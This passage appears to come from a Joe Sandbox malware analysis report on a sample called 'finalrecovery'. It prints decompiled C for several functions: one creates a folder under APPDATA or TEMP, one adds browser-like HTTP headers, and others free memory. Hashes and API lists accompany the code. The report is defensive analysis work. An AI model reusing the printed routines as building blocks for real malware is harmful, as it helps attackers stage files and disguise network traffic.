				__imp__SHGetFolderPathA(0, 0x1a, 0, 0, _t61, 0x264);
				if(_t61 < 0) {
					_t141 = E10005A63(0, __edi, __ecx, __eflags, "APPDATA");
					_t115 = _t141;
					_t12 = _t115 + 1; // 0x1
					_t148 = _t12;
					do {
						_t63 =  *_t115;
						_t115 = _t115 + 1;
						__eflags = _t63;
					} while (_t63 != 0);
					_t116 = _t115 - _t148;
					__eflags = _t116;
					_push(_t116);
					_push(_t141);
				} else {
					_t139 = _t151 - 0x11c;
					_t147 = _t139 + 1;
					do {
						_t108 =  *_t139;
						_t139 = _t139 + 1;
						_t154 = _t108;
					} while (_t108 != 0);
					_push(_t139 - _t147);
					_push(_t151 - 0x11c);
				}
				E1000183D(_t151 - 0x23c);
				_t65 = E10005944(_t151 - 0x23c, _t154);
				_t118 = 7;
				asm("cdq");
				_t119 = _t151 - 0x270;
				_t67 = E10001BB9(_t111, _t151 - 0x270, _t65 % _t118 + 5, _t148, _t150, _t154);
				 *(_t151 - 4) = 1;
				E100019AC(_t151 - 0x258, E10002439(_t67, _t151 - 0x270, _t119, 1));
				 *(_t151 - 4) = 2;
				_t71 =  >=  ?  *((void*)(_t151 - 0x258)) : _t151 - 0x258;
				E100021D6(_t151 - 0x23c,  >=  ?  *((void*)(_t151 - 0x258)) : _t151 - 0x258,  *((intOrPtr*)(_t151 - 0x248)));
				E10001B3F(_t151 - 0x258);
				 *(_t151 - 4) = _t111;
				E10001B3F(_t151 - 0x270);
				_t76 =  >=  ?  *((void*)(_t151 - 0x23c)) : _t151 - 0x23c;
				if(CreateDirectoryA( >=  ?  *((void*)(_t151 - 0x23c)) : _t151 - 0x23c, _t111) != 0) {
					L21:
					E100019AC(_t150, _t151 - 0x23c);
				} else {
					_t148 = GetLastError;
					if(GetLastError() == 0xb7) {
						goto L21;
					} else {
						if(GetTempPathA(0x104, _t151 - 0x224) < 0) {
							_t86 = E10005A63(_t111, GetLastError, _t150, __eflags, "TMPDIR");
							_t144 = _t86;
							_t128 = _t86;
							_t38 = _t128 + 1; // 0x1
							_t112 = _t38;
							do {
								_t87 =  *_t128;
								_t128 = _t128 + 1;
								__eflags = _t87;
							} while (_t87 != 0);
							_t130 = _t151 - 0x23c;
							E1000183D(_t151 - 0x23c, _t144, _t128 - _t112);
							_t111 = 0;
							__eflags = 0;
						} else {
							_t137 = _t151 - 0x224;
							_t146 = _t137 + 1;
							do {
								_t105 =  *_t137;
								_t137 = _t137 + 1;
								_t160 = _t105;
							} while (_t105 != 0);
							_t130 = _t151 - 0x23c;
							E1000183D(_t151 - 0x23c, _t151 - 0x224, _t137 - _t146);
						}
						_t90 = E10005944(_t130, _t160) & 0x80000007;
						if(_t90 < 0) {
							_t90 = (_t90 - 0x00000001 | 0xfffffff8) + 1;
							_t162 = _t90;
						}
						_t40 = _t90 + 4; // 0x4
						_t131 = _t151 - 0x270;
						_t91 = E10001BB9(_t111, _t151 - 0x270, _t40, _t148, _t150, _t162);
						 *(_t151 - 4) = 3;
						E100019AC(_t151 - 0x258, E10002439(_t91, _t151 - 0x270, _t131, 1));
						 *(_t151 - 4) = 4;
						_t95 =  >=  ?  *((void*)(_t151 - 0x258)) : _t151 - 0x258;
						E100021D6(_t151 - 0x23c,  >=  ?  *((void*)(_t151 - 0x258)) : _t151 - 0x258,  *((intOrPtr*)(_t151 - 0x248)));
						E10001B3F(_t151 - 0x258);
						E10001B3F(_t151 - 0x270);
						_t100 =  >=  ?  *((void*)(_t151 - 0x23c)) : _t151 - 0x23c;
						if(CreateDirectoryA( >=  ?  *((void*)(_t151 - 0x23c)) : _t151 - 0x23c, _t111) != 0 || GetLastError() == 0xb7) {
							goto L21;
						} else {
							 *_t150 = _t111;
							_t150[4] = _t111;
							_t150[5] = 0xf;
							 *_t150 = _t111;
						}
					}
				}
				E10001B3F(_t151 - 0x23c);
				return E1000E837(_t111, _t148, _t150);
			}

0x10001c58
0x10001c62
0x10001c67
0x10001c69
0x10001c6f
0x10001c71
0x10001c77
0x10001c7d
0x10001c83
0x10001c8d
0x10001c93
0x10001c99
0x10001ca2
0x10001caa
0x10001cd3
0x10001cd5
0x10001cd7
0x10001cd7
0x10001cda
0x10001cda
0x10001cdc
0x10001cdd
0x10001cdd
0x10001ce1
0x10001ce1
0x10001ce3
0x10001ce4
0x10001cac
0x10001cac
0x10001cb2
0x10001cb5
0x10001cb5
0x10001cb7
0x10001cb8
0x10001cb8
0x10001cc4
0x10001cc5
0x10001cc5
0x10001ceb
0x10001cf0
0x10001cf7
0x10001cf8
0x10001cfb
0x10001d04
0x10001d0f
0x10001d1f
0x10001d24
0x10001d41
0x10001d49
0x10001d54
0x10001d5f
0x10001d62
0x10001d75
0x10001d85
0x10001eb8
0x10001ec1
0x10001d8b
0x10001d8b
0x10001d98
0x00000000
0x10001d9e
0x10001db2
0x10001de0
0x10001de6
0x10001de8
0x10001dea
0x10001dea
0x10001ded
0x10001ded
0x10001def
0x10001df0
0x10001df0
0x10001df8
0x10001dfe
0x10001e03
0x10001e03
0x10001db4
0x10001db4
0x10001dba
0x10001dbd
0x10001dbd
0x10001dbf
0x10001dc0
0x10001dc0
0x10001dce
0x10001dd4
0x10001dd4
0x10001e0a
0x10001e0f
0x10001e15
0x10001e15
0x10001e15
0x10001e16
0x10001e19
0x10001e1f
0x10001e2a
0x10001e3a
0x10001e3f
0x10001e5c
0x10001e64
0x10001e6f
0x10001e7a
0x10001e8d
0x10001e9d
0x00000000
0x10001ea8
0x10001ea8
0x10001eaa
0x10001ead
0x10001eb4
0x10001eb4
0x10001e9d
0x10001d98
0x10001ecc
0x10001ed8

APIs

__EH_prolog3_GS.LIBCMT ref: 10001C62
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,10001FE7,?), ref: 10001CA2
CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,00000001), ref: 10001D7D
GetLastError.KERNEL32(?,?,00000001,00000000,00000001), ref: 10001D91
GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000,00000001), ref: 10001DAA
CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,00000001,?,?,00000001,00000000,00000001), ref: 10001E95
GetLastError.KERNEL32(?,?,00000001,00000000,00000001,?,?,00000001,00000000,00000001), ref: 10001E9F

Strings

TMPDIR, xrefs: 10001DDB
APPDATA, xrefs: 10001CC8

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
String ID: APPDATA$TMPDIR
API String ID: 1838500112-4048745339
Opcode ID: c6a410fc002e645cccb1a5b427bbf7c06c1643087553a93f6c17ba7eb82f6d45
Instruction ID: d5fa76b03151e431a805f557f087b1df6106db16f154645655528106c7a76cbe
Opcode Fuzzy Hash: c6a410fc002e645cccb1a5b427bbf7c06c1643087553a93f6c17ba7eb82f6d45
Instruction Fuzzy Hash: 18619C74900158DAEB24DF64CC99BEDB7B9EF44280F5082D9E04AA2156DB74AB89CF20

Uniqueness

Uniqueness Score: -1.00%

Function 100010F0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64
networkCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E100010F0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t57;
				void* _t60;

				_push(0x20);
				E1000E879(0x1000fb7a, __ebx, __edi, __esi);
				_t57 =  *(_t60 + 8);
				 *((intOrPtr*)(_t60 - 0x18)) = 0xf;
				 *((intOrPtr*)(_t60 - 0x2c)) = 0;
				 *(_t60 - 0x1c) = 0;
				 *((char*)(_t60 - 0x2c)) = 0;
				E1000183D(_t60 - 0x2c, "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", 0x7d);
				 *((intOrPtr*)(_t60 - 4)) = 0;
				_t32 =  >=  ?  *((void*)(_t60 - 0x2c)) : _t60 - 0x2c;
				HttpAddRequestHeadersA(_t57,  >=  ?  *((void*)(_t60 - 0x2c)) : _t60 - 0x2c,  *(_t60 - 0x1c), 0x20000000);
				E1000183D(_t60 - 0x2c, "Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", 0x28);
				_t36 =  >=  ?  *((void*)(_t60 - 0x2c)) : _t60 - 0x2c;
				HttpAddRequestHeadersA(_t57,  >=  ?  *((void*)(_t60 - 0x2c)) : _t60 - 0x2c,  *(_t60 - 0x1c), 0x20000000);
				E1000183D(_t60 - 0x2c, "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", 0x32);
				_t40 =  >=  ?  *((void*)(_t60 - 0x2c)) : _t60 - 0x2c;
				HttpAddRequestHeadersA(_t57,  >=  ?  *((void*)(_t60 - 0x2c)) : _t60 - 0x2c,  *(_t60 - 0x1c), 0x20000000);
				E1000183D(_t60 - 0x2c, "Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", 0x37);
				_t44 =  >=  ?  *((void*)(_t60 - 0x2c)) : _t60 - 0x2c;
				HttpAddRequestHeadersA(_t57,  >=  ?  *((void*)(_t60 - 0x2c)) : _t60 - 0x2c,  *(_t60 - 0x1c), 0x20000000);
				E10001B3F(_t60 - 0x2c);
				return E1000E837(0x20000000, _t57, HttpAddRequestHeadersA);
			}

0x100010f0
0x100010f7
0x100010fc
0x10001104
0x1000110d
0x10001115
0x10001118
0x1000111b
0x10001120
0x10001135
0x1000113f
0x1000114b
0x1000115b
0x10001161
0x1000116d
0x1000117d
0x10001183
0x1000118f
0x1000119f
0x100011a5
0x100011aa
0x100011b4

APIs

__EH_prolog3_GS.LIBCMT ref: 100010F7
HttpAddRequestHeadersA.WININET(?,?,00000010,20000000), ref: 1000113F
HttpAddRequestHeadersA.WININET(?,?,00000010,20000000), ref: 10001161
HttpAddRequestHeadersA.WININET(?,?,00000010,20000000), ref: 10001183
HttpAddRequestHeadersA.WININET(?,?,00000010,20000000), ref: 100011A5

Strings

Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 10001110
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001165
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001143
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001187

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: HeadersHttpRequest$H_prolog3_
String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
API String ID: 1254599795-787135837
Opcode ID: d875d002382c6aac6ec7f921ce8ec808c5f1ecd81fc9b18c8107746166e3de43
Instruction ID: 4ac9521d2edcd2b550c43f161278ef4e4eeb2b8440a5e7b4782c2d804c0e459a
Opcode Fuzzy Hash: d875d002382c6aac6ec7f921ce8ec808c5f1ecd81fc9b18c8107746166e3de43
Instruction Fuzzy Hash: 2921B471D0010DEEEB11DBE9D891EEEBBB8EB18790F90C019E22576051CB75AA45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041C9CB Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0041C9CB(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x431400;
				if(_t68 != 0x431400) {
					E0041E238(_t68);
					_t36 = _a4;
				}
				E0041E238( *((intOrPtr*)(_t36 + 0x3c)));
				E0041E238( *((intOrPtr*)(_a4 + 0x30)));
				E0041E238( *((intOrPtr*)(_a4 + 0x34)));
				E0041E238( *((intOrPtr*)(_a4 + 0x38)));
				E0041E238( *((intOrPtr*)(_a4 + 0x28)));
				E0041E238( *((intOrPtr*)(_a4 + 0x2c)));
				E0041E238( *((intOrPtr*)(_a4 + 0x40)));
				E0041E238( *((intOrPtr*)(_a4 + 0x44)));
				E0041E238( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E0041C7F7(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E0041C862(_t67, _t72, _t73, _t77);
			}

0x0041c9cb
0x0041c9cb
0x0041c9cb
0x0041c9d0
0x0041c9d6
0x0041c9d8
0x0041c9de
0x0041c9e1
0x0041c9e6
0x0041c9e9
0x0041c9ed
0x0041c9f8
0x0041ca03
0x0041ca0e
0x0041ca19
0x0041ca24
0x0041ca2f
0x0041ca3a
0x0041ca48
0x0041ca53
0x0041ca5b
0x0041ca5c
0x0041ca5f
0x0041ca65
0x0041ca69
0x0041ca6d
0x0041ca6e
0x0041ca78
0x0041ca7e
0x0041ca7f
0x0041ca82
0x0041ca88
0x0041ca8c
0x0041ca90
0x0041ca97

APIs

_free.LIBCMT ref: 0041C9E1

Part of subcall function 0041E238: HeapFree.KERNEL32(00000000,00000000,?,00425D07,?,00000000,?,?,?,00425FAA,?,00000007,?,?,0042649D,?), ref: 0041E24E
Part of subcall function 0041E238: GetLastError.KERNEL32(?,?,00425D07,?,00000000,?,?,?,00425FAA,?,00000007,?,?,0042649D,?,?), ref: 0041E260

_free.LIBCMT ref: 0041C9ED
_free.LIBCMT ref: 0041C9F8
_free.LIBCMT ref: 0041CA03
_free.LIBCMT ref: 0041CA0E
_free.LIBCMT ref: 0041CA19
_free.LIBCMT ref: 0041CA24
_free.LIBCMT ref: 0041CA2F
_free.LIBCMT ref: 0041CA3A
_free.LIBCMT ref: 0041CA48

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 064518bb8398a549d41507d19e53a4755c223495735e655d29204e71220b294f
Instruction ID: 66cf2a5b72ad719711799000863d9c42f97125594230b8e5b331ac7c0ede43d3
Opcode Fuzzy Hash: 064518bb8398a549d41507d19e53a4755c223495735e655d29204e71220b294f
Instruction Fuzzy Hash: DE211076900108AFDB05EF96C991CDD7BB8BF08344F4041AAF515AF161DB75DA85CF84

Uniqueness

Uniqueness Score: -1.00%

Function 00440E98 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00440EAE
_free.LIBCMT ref: 00440EBA
_free.LIBCMT ref: 00440EC5
_free.LIBCMT ref: 00440ED0
_free.LIBCMT ref: 00440EDB
_free.LIBCMT ref: 00440EE6
_free.LIBCMT ref: 00440EF1
_free.LIBCMT ref: 00440EFC
_free.LIBCMT ref: 00440F07
_free.LIBCMT ref: 00440F15

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: d79a546062d0302fc42337061297b37c98ef981b727cbe0994bc05bb83e7c45d
Instruction ID: b5acc537e47175a484598864f7b5fa9eab7981bf784aec42cf186d38ae6ea6e0
Opcode Fuzzy Hash: d79a546062d0302fc42337061297b37c98ef981b727cbe0994bc05bb83e7c45d
Instruction Fuzzy Hash: 9821B67690010CBFDF41EF96C881DDE7BB8AF08344F0081AAF6159B121DB35EA958B88

Uniqueness

Uniqueness Score: -1.00%

Function 10006CE8 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E10006CE8(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x10010e60;
				if(_t68 != 0x10010e60) {
					E100079CC(_t68);
					_t36 = _a4;
				}
				E100079CC( *((intOrPtr*)(_t36 + 0x3c)));
				E100079CC( *((intOrPtr*)(_a4 + 0x30)));
				E100079CC( *((intOrPtr*)(_a4 + 0x34)));
				E100079CC( *((intOrPtr*)(_a4 + 0x38)));
				E100079CC( *((intOrPtr*)(_a4 + 0x28)));
				E100079CC( *((intOrPtr*)(_a4 + 0x2c)));
				E100079CC( *((intOrPtr*)(_a4 + 0x40)));
				E100079CC( *((intOrPtr*)(_a4 + 0x44)));
				E100079CC( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E10006B14(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E10006B7F(_t67, _t72, _t73, _t77);
			}

0x10006ce8
0x10006ce8
0x10006ce8
0x10006ced
0x10006cf3
0x10006cf5
0x10006cfb
0x10006cfe
0x10006d03
0x10006d06
0x10006d0a
0x10006d15
0x10006d20
0x10006d2b
0x10006d36
0x10006d41
0x10006d4c
0x10006d57
0x10006d65
0x10006d70
0x10006d78
0x10006d79
0x10006d7c
0x10006d82
0x10006d86
0x10006d8a
0x10006d8b
0x10006d95
0x10006d9b
0x10006d9c
0x10006d9f
0x10006da5
0x10006da9
0x10006dad
0x10006db4

APIs

_free.LIBCMT ref: 10006CFE

Part of subcall function 100079CC: RtlFreeHeap.NTDLL(00000000,00000000,?,10006680), ref: 100079E2
Part of subcall function 100079CC: GetLastError.KERNEL32(?,?,10006680), ref: 100079F4

_free.LIBCMT ref: 10006D0A
_free.LIBCMT ref: 10006D15
_free.LIBCMT ref: 10006D20
_free.LIBCMT ref: 10006D2B
_free.LIBCMT ref: 10006D36
_free.LIBCMT ref: 10006D41
_free.LIBCMT ref: 10006D4C
_free.LIBCMT ref: 10006D57
_free.LIBCMT ref: 10006D65

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b266898b7a7f76116449d05480b171a99e38c3c9977e03bd93cbf6a3d390effc
Instruction ID: 4781c83acf22a40caadf8cb42c071b3f7897bd68c2c10381a670a8560e13fcd9
Opcode Fuzzy Hash: b266898b7a7f76116449d05480b171a99e38c3c9977e03bd93cbf6a3d390effc
Instruction Fuzzy Hash: 4321B67A900109AFDF42DF94CC81DEE7FB9FF08280F0055A6B5599B126DB35EA84CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0042AD31 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0042BA1F), ref: 0042AD4A

Strings

pow, xrefs: 0042ADE8, 0042AE92, 0042AEDF
exp, xrefs: 0042ADC9, 0042AE2E
sqrt, xrefs: 0042AE89
acos, xrefs: 0042AE80
asin, xrefs: 0042AE77
log10, xrefs: 0042AD8C, 0042AD9B
log, xrefs: 0042ADA7, 0042ADB6

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: b5cc97e02160cab54907758622b56858502a5b5ddf27fcd482fea8025da3f996
Instruction ID: 4aa74325dcdc626f541fd1c98c67c5bdae94afb4a4a1130807f65123bd920995
Opcode Fuzzy Hash: b5cc97e02160cab54907758622b56858502a5b5ddf27fcd482fea8025da3f996
Instruction Fuzzy Hash: E3515F70A0062ACBCF109F99F9481AEBB75FB09304F964097DC51A6264C77C8976DB1F

Uniqueness

Uniqueness Score: -1.00%

Function 00425ACF Relevance: 13.7, APIs: 9, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00425ACF(void* __edx, char _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				signed int _t60;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				signed int _t77;
				char _t82;
				void* _t93;
				signed int _t96;
				char _t107;
				char _t108;
				void* _t113;
				char* _t114;
				signed int _t120;
				signed int* _t121;
				char _t123;
				intOrPtr* _t125;
				char* _t130;

				_t113 = __edx;
				_t123 = _a4;
				_v24 = _t123;
				_v20 = 0;
				if( *((intOrPtr*)(_t123 + 0xb0)) != 0 ||  *((intOrPtr*)(_t123 + 0xac)) != 0) {
					_v16 = 1;
					_t93 = E0041E1DB(1, 0x50);
					if(_t93 != 0) {
						_t96 = 0x14;
						memcpy(_t93,  *(_t123 + 0x88), _t96 << 2);
						_t125 = E0041ECAF(4);
						_t120 = 0;
						_v8 = _t125;
						E0041E238(0);
						if(_t125 != 0) {
							 *_t125 = 0;
							_t123 = _a4;
							if( *((intOrPtr*)(_t123 + 0xb0)) == 0) {
								_t53 =  *0x43d160; // 0x43d1b4
								 *_t93 = _t53;
								_t54 =  *0x43d164; // 0x450784
								 *((intOrPtr*)(_t93 + 4)) = _t54;
								_t55 =  *0x43d168; // 0x450784
								 *((intOrPtr*)(_t93 + 8)) = _t55;
								_t56 =  *0x43d190; // 0x43d1b8
								 *((intOrPtr*)(_t93 + 0x30)) = _t56;
								_t57 =  *0x43d194; // 0x450788
								 *((intOrPtr*)(_t93 + 0x34)) = _t57;
								L19:
								 *_v8 = 1;
								if(_t120 != 0) {
									 *_t120 = 1;
								}
								goto L21;
							}
							_t121 = E0041ECAF(4);
							_v12 = _t121;
							E0041E238(0);
							_push(_t93);
							if(_t121 != 0) {
								 *_t121 =  *_t121 & 0x00000000;
								_t122 =  *((intOrPtr*)(_t123 + 0xb0));
								_t69 = E00421645(_t113);
								_t16 = _t93 + 4; // 0x4
								_t71 = E00421645(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0xf, _t16,  &_v24);
								_t18 = _t93 + 8; // 0x8
								_t74 = E00421645(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0x10, _t18, 1);
								_t77 = E00421645(_t113,  &_v24, 2,  *((intOrPtr*)(_t123 + 0xb0)), 0xe, _t93 + 0x30, _t122);
								_t22 = _t93 + 0x34; // 0x34
								if((E00421645(_t113,  &_v24, 2, _t122, 0xf, _t22, 0xe) | _t69 | _t71 | _t74 | _t77) == 0) {
									_t114 =  *((intOrPtr*)(_t93 + 8));
									while(1) {
										_t82 =  *_t114;
										if(_t82 == 0) {
											break;
										}
										_t30 = _t82 - 0x30; // -48
										_t107 = _t30;
										if(_t107 > 9) {
											if(_t82 != 0x3b) {
												L16:
												_t114 = _t114 + 1;
												continue;
											}
											_t130 = _t114;
											do {
												_t108 =  *((intOrPtr*)(_t130 + 1));
												 *_t130 = _t108;
												_t130 = _t130 + 1;
											} while (_t108 != 0);
											continue;
										}
										 *_t114 = _t107;
										goto L16;
									}
									_t120 = _v12;
									_t123 = _a4;
									goto L19;
								}
								E00425A66(_t93);
								E0041E238(_t93);
								E0041E238(_v12);
								_v16 = _v16 | 0xffffffff;
								L12:
								E0041E238(_v8);
								return _v16;
							}
							E0041E238();
							goto L12;
						}
						E0041E238(_t93);
						return 1;
					}
					return 1;
				} else {
					_t120 = 0;
					_v8 = 0;
					_t93 = 0x43d160;
					L21:
					_t60 =  *(_t123 + 0x80);
					if(_t60 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t123 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t60 | 0xffffffff) == 0) {
							E0041E238( *((intOrPtr*)(_t123 + 0x7c)));
							E0041E238( *(_t123 + 0x88));
						}
					}
					 *((intOrPtr*)(_t123 + 0x7c)) = _v8;
					 *(_t123 + 0x80) = _t120;
					 *(_t123 + 0x88) = _t93;
					return 0;
				}
			}

0x00425acf
0x00425ad9
0x00425adf
0x00425ae2
0x00425aeb
0x00425b0a
0x00425b12
0x00425b18
0x00425b2b
0x00425b2c
0x00425b35
0x00425b37
0x00425b3a
0x00425b3d
0x00425b46
0x00425b57
0x00425b59
0x00425b62
0x00425cb1
0x00425cb6
0x00425cb8
0x00425cbd
0x00425cc0
0x00425cc5
0x00425cc8
0x00425ccd
0x00425cd0
0x00425cd5
0x00425c44
0x00425c4a
0x00425c4e
0x00425c50
0x00425c50
0x00000000
0x00425c4e
0x00425b6f
0x00425b73
0x00425b76
0x00425b7d
0x00425b80
0x00425b8d
0x00425b93
0x00425b9f
0x00425ba4
0x00425bb3
0x00425bba
0x00425bc7
0x00425bdb
0x00425be5
0x00425bfc
0x00425c28
0x00425c38
0x00425c38
0x00425c3c
0x00000000
0x00000000
0x00425c2d
0x00425c2d
0x00425c33
0x00425c9f
0x00425c37
0x00425c37
0x00000000
0x00425c37
0x00425ca1
0x00425ca3
0x00425ca3
0x00425ca6
0x00425ca8
0x00425cab
0x00000000
0x00425caf
0x00425c35
0x00000000
0x00425c35
0x00425c3e
0x00425c41
0x00000000
0x00425c41
0x00425bff
0x00425c05
0x00425c0d
0x00425c15
0x00425c19
0x00425c1d
0x00000000
0x00425c25
0x00425b82
0x00000000
0x00425b87
0x00425b49
0x00000000
0x00425b51
0x00000000
0x00425af5
0x00425af5
0x00425af7
0x00425afa
0x00425c52
0x00425c52
0x00425c5a
0x00425c5c
0x00425c5c
0x00425c64
0x00425c69
0x00425c6d
0x00425c72
0x00425c7d
0x00425c83
0x00425c6d
0x00425c87
0x00425c8c
0x00425c92
0x00000000
0x00425c92

APIs

_free.LIBCMT ref: 00425B3D
_free.LIBCMT ref: 00425B49
_free.LIBCMT ref: 00425C72
_free.LIBCMT ref: 00425C7D

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1b39b1e678d8ab2c191d93bfd8c6b1763cd571147d146171f3db8c7565df9f7f
Instruction ID: ea62a9cf6e12698461717c0d25c752f22009df9ef00203b99c68ec3bb5235a1f
Opcode Fuzzy Hash: 1b39b1e678d8ab2c191d93bfd8c6b1763cd571147d146171f3db8c7565df9f7f
Instruction Fuzzy Hash: C8612671A007149FEB20DF66E841BABB7E8EF48310F90456FE945EB281F774AD418B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040C510 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040C510(intOrPtr __edx) {
				intOrPtr _v8;
				char _v16;
				char _v24;
				signed int _v32;
				intOrPtr* _v36;
				char _v40;
				char _v44;
				intOrPtr* _v48;
				char _v68;
